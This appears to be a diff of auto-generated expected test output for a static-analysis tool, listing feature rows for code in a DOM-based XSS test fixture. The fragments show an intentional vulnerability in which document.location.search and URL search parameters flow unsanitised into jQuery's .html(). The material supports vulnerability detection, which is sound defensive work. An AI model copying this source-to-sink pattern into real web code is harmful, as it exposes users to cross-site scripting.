    params URL document location searchParams $ name html params get name searchParams URLSearchParams target substring 1 $ name html searchParams get name | +| autogenerated/Xss/DomBasedXss/tst.js:21:31:21:33 | get | enclosingFunctionName | test | +| autogenerated/Xss/DomBasedXss/tst.js:21:31:21:33 | get | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | CalleeFlexibleAccessPath | searchParams.get | | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16081,6 +112303,75 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | enclosingFunctionName | test | | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:21:35:21:40 | 'name' | receiverName | searchParams | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:24:0 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:24:0 | this | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:24:0 | this | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:24:0 | this | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:24:0 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | 'arguments' object of function foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | 'arguments' object of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | 'arguments' object of function foo | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | 'arguments' object of function foo | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | 'arguments' object of function foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | exceptional return of function foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | exceptional return of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | exceptional return of function foo | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | exceptional return of function foo | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | exceptional return of function foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | functio ... get);\\n} | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | functio ... get);\\n} | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | functio ... get);\\n} | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | return of function foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | return of function foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | return of function foo | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | return of function foo | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:1:27:1 | return of function foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:10:24:12 | foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:24:14:24:19 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:3 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:3 | $ | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:3 | $ | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:3 | $ | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:3 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | $('myId') | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | $('myId') | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | $('myId') | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | exceptional return of $('myId') | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | exceptional return of $('myId') | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | exceptional return of $('myId') | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | exceptional return of $('myId') | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:11 | exceptional return of $('myId') | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:16 | $('myId').html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:16 | $('myId').html | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:16 | $('myId').html | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:16 | $('myId').html | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:16 | $('myId').html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | $('myId ... target) | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | $('myId ... target) | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | $('myId ... target) | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | $('myId ... target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | exceptional return of $('myId ... target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | exceptional return of $('myId ... target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | exceptional return of $('myId ... target) | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | exceptional return of $('myId ... target) | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:3:26:24 | exceptional return of $('myId ... target) | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | CalleeFlexibleAccessPath | $ | | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16088,6 +112379,11 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | enclosingFunctionBody | target $ myId html target | | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | enclosingFunctionName | foo | | autogenerated/Xss/DomBasedXss/tst.js:26:5:26:10 | 'myId' | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:26:13:26:16 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:26:13:26:16 | html | contextSurroundingFunctionParameters | (target) | +| autogenerated/Xss/DomBasedXss/tst.js:26:13:26:16 | html | enclosingFunctionBody | target $ myId html target | +| autogenerated/Xss/DomBasedXss/tst.js:26:13:26:16 | html | enclosingFunctionName | foo | +| autogenerated/Xss/DomBasedXss/tst.js:26:13:26:16 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | CalleeFlexibleAccessPath | $().html | | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -16095,37 +112391,276 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | enclosingFunctionBody | target $ myId html target | | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | enclosingFunctionName | foo | | autogenerated/Xss/DomBasedXss/tst.js:26:18:26:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:3 | foo | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:3 | foo | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:3 | foo | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | exceptional return of foo(doc ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | exceptional return of foo(doc ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | exceptional return of foo(doc ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | foo(doc ... search) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | foo(doc ... search) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:1:28:29 | foo(doc ... search) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:12 | document | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:12 | document | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:12 | document | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:21 | document.location | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:21 | document.location | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:21 | document.location | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:28 | documen ... .search | CalleeFlexibleAccessPath | foo | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:28 | documen ... .search | InputArgumentIndex | 0 | +| autogenerated/Xss/DomBasedXss/tst.js:28:5:28:28 | documen ... .search | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| 